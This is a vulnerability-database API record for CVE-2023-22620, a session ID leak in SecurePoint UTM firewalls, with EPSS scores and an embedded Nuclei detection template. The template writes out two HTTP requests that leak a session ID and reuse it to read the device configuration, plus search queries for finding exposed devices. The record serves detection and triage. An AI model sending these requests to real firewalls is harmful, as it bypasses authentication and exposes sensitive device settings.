{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-22620/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-22620/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-22620/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-22620/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-22620/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-22620"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-22620"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.0392,
      "kev": false,
      "percentile": 0.89936
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2023/CVE-2023-22620.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2023-22620\n\ninfo:\n  name: SecurePoint UTM 12.x Session ID Leak\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or perform actions on behalf of the user.\n  remediation: Upgrade to version 12.2.5.1 or newer\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-22620\n    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txt\n    - https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/\n    - https://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.html\n    - https://rcesecurity.com\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\n    cvss-score: 7.5\n    cve-id: CVE-2023-22620\n    cwe-id: CWE-863\n    epss-score: 0.0392\n    epss-percentile: 0.89936\n    cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: securepoint\n    product: unified_threat_management\n    shodan-query:\n      - title:\"Securepoint UTM\"\n      - http.title:\"securepoint utm\"\n    fofa-query: title=\"securepoint utm\"\n    google-query: intitle:\"securepoint utm\"\n  tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /spcgi.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/json; charset=UTF-8\n        Accept-Encoding: gzip, deflate\n        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n        {\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n      - |\n        POST /spcgi.cgi HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/json; charset=UTF-8\n        Accept-Encoding: gzip, deflate\n        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n        {\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_2\n        words:\n          - '\"status\":\"OK\"'\n\n      - type: word\n        part: header_2\n        words:\n          - 'application/json'\n\n    extractors:\n      - type: regex\n        name: session\n        group: 1\n        regex:\n          - '\"sessionid\": \"([a-z0-9]+)\"'\n        internal: true\n# digest: 490a0046304402203eaa6abcc817d778196b7629af2c172e4dd8064f2ba4c69381cb2b8240e379cb022035f7b70426173aba59dfc7922a53c8c60a433bb642f066704ca2357917211d40:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2023-22620"
}